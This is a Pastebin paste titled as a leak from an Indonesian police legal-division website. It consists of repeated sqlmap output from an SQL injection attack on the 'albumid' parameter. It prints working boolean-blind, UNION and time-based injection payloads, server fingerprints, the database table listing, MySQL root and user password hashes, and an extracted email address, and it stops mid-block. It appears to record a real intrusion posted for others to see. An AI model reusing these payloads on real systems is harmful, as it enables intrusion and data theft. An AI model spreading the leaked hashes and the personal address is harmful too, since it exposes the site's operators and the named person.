Advertisement
RussX9

Divisi Hukum polri Leaked

Oct 10th, 2014
397
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 28.81 KB | None | 0 0
  1. sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
  2. ---
  3. Place: GET
  4. Parameter: albumid
  5. Type: boolean-based blind
  6. Title: AND boolean-based blind - WHERE or HAVING clause
  7. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  8.  
  9. Type: UNION query
  10. Title: MySQL UNION query (NULL) - 6 columns
  11. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  12.  
  13. Type: AND/OR time-based blind
  14. Title: MySQL > 5.0.11 AND time-based blind
  15. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  16. ---
  17. web server operating system: Linux Debian 6.0 (squeeze)
  18. web application technology: PHP 5.3.3, Apache 2.2.16
  19. back-end DBMS: MySQL 5.0.11
  20. available databases [3]:
  21. [*] divkum
  22. [*] information_schema
  23. [*] mysql
  24.  
  25. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  26. ---
  27. Place: GET
  28. Parameter: albumid
  29. Type: boolean-based blind
  30. Title: AND boolean-based blind - WHERE or HAVING clause
  31. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  32.  
  33. Type: UNION query
  34. Title: MySQL UNION query (NULL) - 6 columns
  35. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  36.  
  37. Type: AND/OR time-based blind
  38. Title: MySQL > 5.0.11 AND time-based blind
  39. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  40. ---
  41. web server operating system: Linux Debian 6.0 (squeeze)
  42. web application technology: PHP 5.3.3, Apache 2.2.16
  43. back-end DBMS: MySQL 5.0.11
  44. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  45. ---
  46. Place: GET
  47. Parameter: albumid
  48. Type: boolean-based blind
  49. Title: AND boolean-based blind - WHERE or HAVING clause
  50. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  51.  
  52. Type: UNION query
  53. Title: MySQL UNION query (NULL) - 6 columns
  54. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  55.  
  56. Type: AND/OR time-based blind
  57. Title: MySQL > 5.0.11 AND time-based blind
  58. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  59. ---
  60. web server operating system: Linux Debian 6.0 (squeeze)
  61. web application technology: PHP 5.3.3, Apache 2.2.16
  62. back-end DBMS: MySQL 5.0.11
  63. Database: divkum
  64. [49 tables]
  65. +-----------------------------+
  66. | album |
  67. | bankum |
  68. | cermin |
  69. | dokumen |
  70. | email |
  71. | gambar |
  72. | hakakses |
  73. | jenisdok |
  74. | jos_banner |
  75. | jos_bannerclient |
  76. | jos_bannertrack |
  77. | jos_categories |
  78. | jos_components |
  79. | jos_contact_details |
  80. | jos_content |
  81. | jos_content_frontpage |
  82. | jos_content_rating |
  83. | jos_core_acl_aro |
  84. | jos_core_acl_aro_groups |
  85. | jos_core_acl_aro_map |
  86. | jos_core_acl_aro_sections |
  87. | jos_core_acl_groups_aro_map |
  88. | jos_core_log_items |
  89. | jos_core_log_searches |
  90. | jos_groups |
  91. | jos_menu |
  92. | jos_menu_types |
  93. | jos_messages |
  94. | jos_messages_cfg |
  95. | jos_migration_backlinks |
  96. | jos_modules |
  97. | jos_modules_menu |
  98. | jos_newsfeeds |
  99. | jos_plugins |
  100. | jos_poll_data |
  101. | jos_poll_date |
  102. | jos_poll_menu |
  103. | jos_polls |
  104. | jos_sections |
  105. | jos_session |
  106. | jos_stats_agents |
  107. | jos_templates_menu |
  108. | jos_users |
  109. | jos_weblinks |
  110. | komentar |
  111. | konter |
  112. | pemakai |
  113. | pengaduan |
  114. | vdokumen |
  115. +-----------------------------+
  116.  
  117. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  118. ---
  119. Place: GET
  120. Parameter: albumid
  121. Type: boolean-based blind
  122. Title: AND boolean-based blind - WHERE or HAVING clause
  123. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  124.  
  125. Type: UNION query
  126. Title: MySQL UNION query (NULL) - 6 columns
  127. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  128.  
  129. Type: AND/OR time-based blind
  130. Title: MySQL > 5.0.11 AND time-based blind
  131. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  132. ---
  133. web server operating system: Linux Debian 6.0 (squeeze)
  134. web application technology: PHP 5.3.3, Apache 2.2.16
  135. back-end DBMS: MySQL 5.0.11
  136. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  137. ---
  138. Place: GET
  139. Parameter: albumid
  140. Type: boolean-based blind
  141. Title: AND boolean-based blind - WHERE or HAVING clause
  142. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  143.  
  144. Type: UNION query
  145. Title: MySQL UNION query (NULL) - 6 columns
  146. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  147.  
  148. Type: AND/OR time-based blind
  149. Title: MySQL > 5.0.11 AND time-based blind
  150. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  151. ---
  152. web server operating system: Linux Debian 6.0 (squeeze)
  153. web application technology: PHP 5.3.3, Apache 2.2.16
  154. back-end DBMS: MySQL 5.0.11
  155. Database: divkum
  156. Table: email
  157. [1 column]
  158. +---------+-------------+
  159. | Column | Type |
  160. +---------+-------------+
  161. | nasehat | non-numeric |
  162. +---------+-------------+
  163.  
  164. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  165. ---
  166. Place: GET
  167. Parameter: albumid
  168. Type: boolean-based blind
  169. Title: AND boolean-based blind - WHERE or HAVING clause
  170. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  171.  
  172. Type: UNION query
  173. Title: MySQL UNION query (NULL) - 6 columns
  174. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  175.  
  176. Type: AND/OR time-based blind
  177. Title: MySQL > 5.0.11 AND time-based blind
  178. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  179. ---
  180. web server operating system: Linux Debian 6.0 (squeeze)
  181. web application technology: PHP 5.3.3, Apache 2.2.16
  182. back-end DBMS: MySQL 5.0.11
  183. Database: mysql
  184. [23 tables]
  185. +---------------------------+
  186. | user |
  187. | columns_priv |
  188. | db |
  189. | event |
  190. | func |
  191. | general_log |
  192. | help_category |
  193. | help_keyword |
  194. | help_relation |
  195. | help_topic |
  196. | host |
  197. | ndb_binlog_index |
  198. | plugin |
  199. | proc |
  200. | procs_priv |
  201. | servers |
  202. | slow_log |
  203. | tables_priv |
  204. | time_zone |
  205. | time_zone_leap_second |
  206. | time_zone_name |
  207. | time_zone_transition |
  208. | time_zone_transition_type |
  209. +---------------------------+
  210.  
  211. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  212. ---
  213. Place: GET
  214. Parameter: albumid
  215. Type: boolean-based blind
  216. Title: AND boolean-based blind - WHERE or HAVING clause
  217. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  218.  
  219. Type: UNION query
  220. Title: MySQL UNION query (NULL) - 6 columns
  221. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  222.  
  223. Type: AND/OR time-based blind
  224. Title: MySQL > 5.0.11 AND time-based blind
  225. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  226. ---
  227. back-end DBMS: MySQL 5.0.11
  228. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  229. ---
  230. Place: GET
  231. Parameter: albumid
  232. Type: boolean-based blind
  233. Title: AND boolean-based blind - WHERE or HAVING clause
  234. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  235.  
  236. Type: UNION query
  237. Title: MySQL UNION query (NULL) - 6 columns
  238. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  239.  
  240. Type: AND/OR time-based blind
  241. Title: MySQL > 5.0.11 AND time-based blind
  242. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  243. ---
  244. web server operating system: Linux Debian 6.0 (squeeze)
  245. web application technology: PHP 5.3.3, Apache 2.2.16
  246. back-end DBMS: MySQL 5.0.11
  247. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  248. ---
  249. Place: GET
  250. Parameter: albumid
  251. Type: boolean-based blind
  252. Title: AND boolean-based blind - WHERE or HAVING clause
  253. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  254.  
  255. Type: UNION query
  256. Title: MySQL UNION query (NULL) - 6 columns
  257. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  258.  
  259. Type: AND/OR time-based blind
  260. Title: MySQL > 5.0.11 AND time-based blind
  261. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  262. ---
  263. web server operating system: Linux Debian 6.0 (squeeze)
  264. web application technology: PHP 5.3.3, Apache 2.2.16
  265. back-end DBMS: MySQL 5.0.11
  266. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  267. ---
  268. Place: GET
  269. Parameter: albumid
  270. Type: boolean-based blind
  271. Title: AND boolean-based blind - WHERE or HAVING clause
  272. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  273.  
  274. Type: UNION query
  275. Title: MySQL UNION query (NULL) - 6 columns
  276. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  277.  
  278. Type: AND/OR time-based blind
  279. Title: MySQL > 5.0.11 AND time-based blind
  280. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  281. ---
  282. web server operating system: Linux Debian 6.0 (squeeze)
  283. web application technology: PHP 5.3.3, Apache 2.2.16
  284. back-end DBMS: MySQL 5.0.11
  285. available databases [3]:
  286. [*] divkum
  287. [*] information_schema
  288. [*] mysql
  289.  
  290. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  291. ---
  292. Place: GET
  293. Parameter: albumid
  294. Type: boolean-based blind
  295. Title: AND boolean-based blind - WHERE or HAVING clause
  296. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  297.  
  298. Type: UNION query
  299. Title: MySQL UNION query (NULL) - 6 columns
  300. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  301.  
  302. Type: AND/OR time-based blind
  303. Title: MySQL > 5.0.11 AND time-based blind
  304. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  305. ---
  306. web server operating system: Linux Debian 6.0 (squeeze)
  307. web application technology: PHP 5.3.3, Apache 2.2.16
  308. back-end DBMS: MySQL 5.0.11
  309. Database: mysql
  310. [23 tables]
  311. +---------------------------+
  312. | user |
  313. | columns_priv |
  314. | db |
  315. | event |
  316. | func |
  317. | general_log |
  318. | help_category |
  319. | help_keyword |
  320. | help_relation |
  321. | help_topic |
  322. | host |
  323. | ndb_binlog_index |
  324. | plugin |
  325. | proc |
  326. | procs_priv |
  327. | servers |
  328. | slow_log |
  329. | tables_priv |
  330. | time_zone |
  331. | time_zone_leap_second |
  332. | time_zone_name |
  333. | time_zone_transition |
  334. | time_zone_transition_type |
  335. +---------------------------+
  336.  
  337. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  338. ---
  339. Place: GET
  340. Parameter: albumid
  341. Type: boolean-based blind
  342. Title: AND boolean-based blind - WHERE or HAVING clause
  343. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  344.  
  345. Type: UNION query
  346. Title: MySQL UNION query (NULL) - 6 columns
  347. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  348.  
  349. Type: AND/OR time-based blind
  350. Title: MySQL > 5.0.11 AND time-based blind
  351. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  352. ---
  353. web server operating system: Linux Debian 6.0 (squeeze)
  354. web application technology: PHP 5.3.3, Apache 2.2.16
  355. back-end DBMS: MySQL 5.0.11
  356. Database: mysql
  357. Table: user
  358. [5 entries]
  359. +-----------------+--------+-------------------------------------------+
  360. | host | user | password |
  361. +-----------------+--------+-------------------------------------------+
  362. | % | divkum | *31FFCDAD3B0F1F847E8F4FDFAC1AFAB3D26251B1 |
  363. | % | root | *7D189CADBC8A0388C65FEA4B39480CBDC349F9BD |
  364. | 127.0.0.1 | root | *7D189CADBC8A0388C65FEA4B39480CBDC349F9BD |
  365. | 192.168.212.101 | divkum | *7D189CADBC8A0388C65FEA4B39480CBDC349F9BD |
  366. | 192.168.212.101 | root | *7D189CADBC8A0388C65FEA4B39480CBDC349F9BD |
  367. +-----------------+--------+-------------------------------------------+
  368.  
  369. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  370. ---
  371. Place: GET
  372. Parameter: albumid
  373. Type: boolean-based blind
  374. Title: AND boolean-based blind - WHERE or HAVING clause
  375. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  376.  
  377. Type: UNION query
  378. Title: MySQL UNION query (NULL) - 6 columns
  379. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  380.  
  381. Type: AND/OR time-based blind
  382. Title: MySQL > 5.0.11 AND time-based blind
  383. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  384. ---
  385. web server operating system: Linux Debian 6.0 (squeeze)
  386. web application technology: PHP 5.3.3, Apache 2.2.16
  387. back-end DBMS: MySQL 5.0.11
  388. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  389. ---
  390. Place: GET
  391. Parameter: albumid
  392. Type: boolean-based blind
  393. Title: AND boolean-based blind - WHERE or HAVING clause
  394. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  395.  
  396. Type: UNION query
  397. Title: MySQL UNION query (NULL) - 6 columns
  398. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  399.  
  400. Type: AND/OR time-based blind
  401. Title: MySQL > 5.0.11 AND time-based blind
  402. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  403. ---
  404. web server operating system: Linux Debian 6.0 (squeeze)
  405. web application technology: PHP 5.3.3, Apache 2.2.16
  406. back-end DBMS: MySQL 5.0.11
  407. available databases [3]:
  408. [*] divkum
  409. [*] information_schema
  410. [*] mysql
  411.  
  412. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  413. ---
  414. Place: GET
  415. Parameter: albumid
  416. Type: boolean-based blind
  417. Title: AND boolean-based blind - WHERE or HAVING clause
  418. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  419.  
  420. Type: UNION query
  421. Title: MySQL UNION query (NULL) - 6 columns
  422. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  423.  
  424. Type: AND/OR time-based blind
  425. Title: MySQL > 5.0.11 AND time-based blind
  426. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  427. ---
  428. web server operating system: Linux Debian 6.0 (squeeze)
  429. web application technology: PHP 5.3.3, Apache 2.2.16
  430. back-end DBMS: MySQL 5.0.11
  431. Database: divkum
  432. [49 tables]
  433. +-----------------------------+
  434. | album |
  435. | bankum |
  436. | cermin |
  437. | dokumen |
  438. | email |
  439. | gambar |
  440. | hakakses |
  441. | jenisdok |
  442. | jos_banner |
  443. | jos_bannerclient |
  444. | jos_bannertrack |
  445. | jos_categories |
  446. | jos_components |
  447. | jos_contact_details |
  448. | jos_content |
  449. | jos_content_frontpage |
  450. | jos_content_rating |
  451. | jos_core_acl_aro |
  452. | jos_core_acl_aro_groups |
  453. | jos_core_acl_aro_map |
  454. | jos_core_acl_aro_sections |
  455. | jos_core_acl_groups_aro_map |
  456. | jos_core_log_items |
  457. | jos_core_log_searches |
  458. | jos_groups |
  459. | jos_menu |
  460. | jos_menu_types |
  461. | jos_messages |
  462. | jos_messages_cfg |
  463. | jos_migration_backlinks |
  464. | jos_modules |
  465. | jos_modules_menu |
  466. | jos_newsfeeds |
  467. | jos_plugins |
  468. | jos_poll_data |
  469. | jos_poll_date |
  470. | jos_poll_menu |
  471. | jos_polls |
  472. | jos_sections |
  473. | jos_session |
  474. | jos_stats_agents |
  475. | jos_templates_menu |
  476. | jos_users |
  477. | jos_weblinks |
  478. | komentar |
  479. | konter |
  480. | pemakai |
  481. | pengaduan |
  482. | vdokumen |
  483. +-----------------------------+
  484.  
  485. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  486. ---
  487. Place: GET
  488. Parameter: albumid
  489. Type: boolean-based blind
  490. Title: AND boolean-based blind - WHERE or HAVING clause
  491. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  492.  
  493. Type: UNION query
  494. Title: MySQL UNION query (NULL) - 6 columns
  495. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  496.  
  497. Type: AND/OR time-based blind
  498. Title: MySQL > 5.0.11 AND time-based blind
  499. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  500. ---
  501. web server operating system: Linux Debian 6.0 (squeeze)
  502. web application technology: PHP 5.3.3, Apache 2.2.16
  503. back-end DBMS: MySQL 5.0.11
  504. Database: divkum
  505. Table: gambar
  506. [1 column]
  507. +---------+-------------+
  508. | Column | Type |
  509. +---------+-------------+
  510. | nasehat | non-numeric |
  511. +---------+-------------+
  512.  
  513. Database: divkum
  514. Table: jos_content
  515. [1 column]
  516. +---------+-------------+
  517. | Column | Type |
  518. +---------+-------------+
  519. | nasehat | non-numeric |
  520. +---------+-------------+
  521.  
  522. Database: divkum
  523. Table: jos_newsfeeds
  524. [1 column]
  525. +---------+-------------+
  526. | Column | Type |
  527. +---------+-------------+
  528. | nasehat | non-numeric |
  529. +---------+-------------+
  530.  
  531. Database: divkum
  532. Table: jos_plugins
  533. [1 column]
  534. +---------+-------------+
  535. | Column | Type |
  536. +---------+-------------+
  537. | nasehat | non-numeric |
  538. +---------+-------------+
  539.  
  540. Database: divkum
  541. Table: jos_groups
  542. [1 column]
  543. +---------+-------------+
  544. | Column | Type |
  545. +---------+-------------+
  546. | nasehat | non-numeric |
  547. +---------+-------------+
  548.  
  549. Database: divkum
  550. Table: jos_session
  551. [1 column]
  552. +---------+-------------+
  553. | Column | Type |
  554. +---------+-------------+
  555. | nasehat | non-numeric |
  556. +---------+-------------+
  557.  
  558. Database: divkum
  559. Table: pemakai
  560. [1 column]
  561. +---------+-------------+
  562. | Column | Type |
  563. +---------+-------------+
  564. | nasehat | non-numeric |
  565. +---------+-------------+
  566.  
  567. Database: divkum
  568. Table: jos_weblinks
  569. [1 column]
  570. +---------+-------------+
  571. | Column | Type |
  572. +---------+-------------+
  573. | nasehat | non-numeric |
  574. +---------+-------------+
  575.  
  576. Database: divkum
  577. Table: jos_messages
  578. [1 column]
  579. +---------+-------------+
  580. | Column | Type |
  581. +---------+-------------+
  582. | nasehat | non-numeric |
  583. +---------+-------------+
  584.  
  585. Database: divkum
  586. Table: jos_banner
  587. [1 column]
  588. +---------+-------------+
  589. | Column | Type |
  590. +---------+-------------+
  591. | nasehat | non-numeric |
  592. +---------+-------------+
  593.  
  594. Database: divkum
  595. Table: jos_poll_menu
  596. [1 column]
  597. +---------+-------------+
  598. | Column | Type |
  599. +---------+-------------+
  600. | nasehat | non-numeric |
  601. +---------+-------------+
  602.  
  603. Database: divkum
  604. Table: album
  605. [1 column]
  606. +---------+-------------+
  607. | Column | Type |
  608. +---------+-------------+
  609. | nasehat | non-numeric |
  610. +---------+-------------+
  611.  
  612. Database: divkum
  613. Table: jos_core_acl_aro
  614. [1 column]
  615. +---------+-------------+
  616. | Column | Type |
  617. +---------+-------------+
  618. | nasehat | non-numeric |
  619. +---------+-------------+
  620.  
  621. Database: divkum
  622. Table: pengaduan
  623. [1 column]
  624. +---------+-------------+
  625. | Column | Type |
  626. +---------+-------------+
  627. | nasehat | non-numeric |
  628. +---------+-------------+
  629.  
  630. Database: divkum
  631. Table: jos_content_frontpage
  632. [1 column]
  633. +---------+-------------+
  634. | Column | Type |
  635. +---------+-------------+
  636. | nasehat | non-numeric |
  637. +---------+-------------+
  638.  
  639. Database: divkum
  640. Table: jos_menu_types
  641. [1 column]
  642. +---------+-------------+
  643. | Column | Type |
  644. +---------+-------------+
  645. | nasehat | non-numeric |
  646. +---------+-------------+
  647.  
  648. Database: divkum
  649. Table: jos_menu
  650. [1 column]
  651. +---------+-------------+
  652. | Column | Type |
  653. +---------+-------------+
  654. | nasehat | non-numeric |
  655. +---------+-------------+
  656.  
  657. Database: divkum
  658. Table: konter
  659. [1 column]
  660. +---------+-------------+
  661. | Column | Type |
  662. +---------+-------------+
  663. | nasehat | non-numeric |
  664. +---------+-------------+
  665.  
  666. Database: divkum
  667. Table: jos_templates_menu
  668. [1 column]
  669. +---------+-------------+
  670. | Column | Type |
  671. +---------+-------------+
  672. | nasehat | non-numeric |
  673. +---------+-------------+
  674.  
  675. Database: divkum
  676. Table: jos_components
  677. [1 column]
  678. +---------+-------------+
  679. | Column | Type |
  680. +---------+-------------+
  681. | nasehat | non-numeric |
  682. +---------+-------------+
  683.  
  684. Database: divkum
  685. Table: jos_modules_menu
  686. [1 column]
  687. +---------+-------------+
  688. | Column | Type |
  689. +---------+-------------+
  690. | nasehat | non-numeric |
  691. +---------+-------------+
  692.  
  693. Database: divkum
  694. Table: jos_bannertrack
  695. [1 column]
  696. +---------+-------------+
  697. | Column | Type |
  698. +---------+-------------+
  699. | nasehat | non-numeric |
  700. +---------+-------------+
  701.  
  702. Database: divkum
  703. Table: jenisdok
  704. [1 column]
  705. +---------+-------------+
  706. | Column | Type |
  707. +---------+-------------+
  708. | nasehat | non-numeric |
  709. +---------+-------------+
  710.  
  711. Database: divkum
  712. Table: jos_users
  713. [1 column]
  714. +---------+-------------+
  715. | Column | Type |
  716. +---------+-------------+
  717. | nasehat | non-numeric |
  718. +---------+-------------+
  719.  
  720. Database: divkum
  721. Table: jos_poll_data
  722. [1 column]
  723. +---------+-------------+
  724. | Column | Type |
  725. +---------+-------------+
  726. | nasehat | non-numeric |
  727. +---------+-------------+
  728.  
  729. Database: divkum
  730. Table: cermin
  731. [1 column]
  732. +---------+-------------+
  733. | Column | Type |
  734. +---------+-------------+
  735. | nasehat | non-numeric |
  736. +---------+-------------+
  737.  
  738. Database: divkum
  739. Table: jos_poll_date
  740. [1 column]
  741. +---------+-------------+
  742. | Column | Type |
  743. +---------+-------------+
  744. | nasehat | non-numeric |
  745. +---------+-------------+
  746.  
  747. Database: divkum
  748. Table: jos_polls
  749. [1 column]
  750. +---------+-------------+
  751. | Column | Type |
  752. +---------+-------------+
  753. | nasehat | non-numeric |
  754. +---------+-------------+
  755.  
  756. Database: divkum
  757. Table: vdokumen
  758. [1 column]
  759. +---------+-------------+
  760. | Column | Type |
  761. +---------+-------------+
  762. | nasehat | non-numeric |
  763. +---------+-------------+
  764.  
  765. Database: divkum
  766. Table: jos_modules
  767. [1 column]
  768. +---------+-------------+
  769. | Column | Type |
  770. +---------+-------------+
  771. | nasehat | non-numeric |
  772. +---------+-------------+
  773.  
  774. Database: divkum
  775. Table: jos_categories
  776. [1 column]
  777. +---------+-------------+
  778. | Column | Type |
  779. +---------+-------------+
  780. | nasehat | non-numeric |
  781. +---------+-------------+
  782.  
  783. Database: divkum
  784. Table: jos_core_log_items
  785. [1 column]
  786. +---------+-------------+
  787. | Column | Type |
  788. +---------+-------------+
  789. | nasehat | non-numeric |
  790. +---------+-------------+
  791.  
  792. Database: divkum
  793. Table: jos_core_log_searches
  794. [1 column]
  795. +---------+-------------+
  796. | Column | Type |
  797. +---------+-------------+
  798. | nasehat | non-numeric |
  799. +---------+-------------+
  800.  
  801. Database: divkum
  802. Table: bankum
  803. [1 column]
  804. +---------+-------------+
  805. | Column | Type |
  806. +---------+-------------+
  807. | nasehat | non-numeric |
  808. +---------+-------------+
  809.  
  810. Database: divkum
  811. Table: jos_contact_details
  812. [1 column]
  813. +---------+-------------+
  814. | Column | Type |
  815. +---------+-------------+
  816. | nasehat | non-numeric |
  817. +---------+-------------+
  818.  
  819. Database: divkum
  820. Table: hakakses
  821. [1 column]
  822. +---------+-------------+
  823. | Column | Type |
  824. +---------+-------------+
  825. | nasehat | non-numeric |
  826. +---------+-------------+
  827.  
  828. Database: divkum
  829. Table: dokumen
  830. [1 column]
  831. +---------+-------------+
  832. | Column | Type |
  833. +---------+-------------+
  834. | nasehat | non-numeric |
  835. +---------+-------------+
  836.  
  837. Database: divkum
  838. Table: jos_sections
  839. [1 column]
  840. +---------+-------------+
  841. | Column | Type |
  842. +---------+-------------+
  843. | nasehat | non-numeric |
  844. +---------+-------------+
  845.  
  846. Database: divkum
  847. Table: jos_migration_backlinks
  848. [1 column]
  849. +---------+-------------+
  850. | Column | Type |
  851. +---------+-------------+
  852. | nasehat | non-numeric |
  853. +---------+-------------+
  854.  
  855. Database: divkum
  856. Table: jos_bannerclient
  857. [1 column]
  858. +---------+-------------+
  859. | Column | Type |
  860. +---------+-------------+
  861. | nasehat | non-numeric |
  862. +---------+-------------+
  863.  
  864. Database: divkum
  865. Table: jos_core_acl_aro_map
  866. [1 column]
  867. +---------+-------------+
  868. | Column | Type |
  869. +---------+-------------+
  870. | nasehat | non-numeric |
  871. +---------+-------------+
  872.  
  873. Database: divkum
  874. Table: jos_core_acl_aro_groups
  875. [1 column]
  876. +---------+-------------+
  877. | Column | Type |
  878. +---------+-------------+
  879. | nasehat | non-numeric |
  880. +---------+-------------+
  881.  
  882. Database: divkum
  883. Table: jos_messages_cfg
  884. [1 column]
  885. +---------+-------------+
  886. | Column | Type |
  887. +---------+-------------+
  888. | nasehat | non-numeric |
  889. +---------+-------------+
  890.  
  891. Database: divkum
  892. Table: email
  893. [1 column]
  894. +---------+-------------+
  895. | Column | Type |
  896. +---------+-------------+
  897. | nasehat | non-numeric |
  898. +---------+-------------+
  899.  
  900. Database: divkum
  901. Table: jos_content_rating
  902. [1 column]
  903. +---------+-------------+
  904. | Column | Type |
  905. +---------+-------------+
  906. | nasehat | non-numeric |
  907. +---------+-------------+
  908.  
  909. Database: divkum
  910. Table: jos_core_acl_groups_aro_map
  911. [1 column]
  912. +---------+-------------+
  913. | Column | Type |
  914. +---------+-------------+
  915. | nasehat | non-numeric |
  916. +---------+-------------+
  917.  
  918. Database: divkum
  919. Table: jos_stats_agents
  920. [1 column]
  921. +---------+-------------+
  922. | Column | Type |
  923. +---------+-------------+
  924. | nasehat | non-numeric |
  925. +---------+-------------+
  926.  
  927. Database: divkum
  928. Table: jos_core_acl_aro_sections
  929. [1 column]
  930. +---------+-------------+
  931. | Column | Type |
  932. +---------+-------------+
  933. | nasehat | non-numeric |
  934. +---------+-------------+
  935.  
  936. Database: divkum
  937. Table: komentar
  938. [1 column]
  939. +---------+-------------+
  940. | Column | Type |
  941. +---------+-------------+
  942. | nasehat | non-numeric |
  943. +---------+-------------+
  944.  
  945. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  946. ---
  947. Place: GET
  948. Parameter: albumid
  949. Type: boolean-based blind
  950. Title: AND boolean-based blind - WHERE or HAVING clause
  951. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  952.  
  953. Type: UNION query
  954. Title: MySQL UNION query (NULL) - 6 columns
  955. Payload: albumid=-2305' UNION ALL SELECT NULL,CONCAT(0x716c727371,0x44476163577753576d57,0x7164727671),NULL,NULL,NULL,NULL#
  956.  
  957. Type: AND/OR time-based blind
  958. Title: MySQL > 5.0.11 AND time-based blind
  959. Payload: albumid=21' AND SLEEP(5) AND 'PkYW'='PkYW
  960. ---
  961. web server operating system: Linux Debian 6.0 (squeeze)
  962. web application technology: PHP 5.3.3, Apache 2.2.16
  963. back-end DBMS: MySQL 5.0.11
  964. Database: divkum
  965. Table: email
  966. [1 entry]
  967. +------------------------------------+
  968. | nasehat |
  969. +------------------------------------+
  970. | masade.soedarmadi@infosolusi.co.id |
  971. +------------------------------------+
  972.  
  973. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  974. ---
  975. Place: GET
  976. Parameter: albumid
  977. Type: boolean-based blind
  978. Title: AND boolean-based blind - WHERE or HAVING clause
  979. Payload: albumid=21' AND 6757=6757 AND 'bFFj'='bFFj
  980.  
  981. Type: UNION query
  982. Title: MySQL UNION query (NULL) - 6 columns
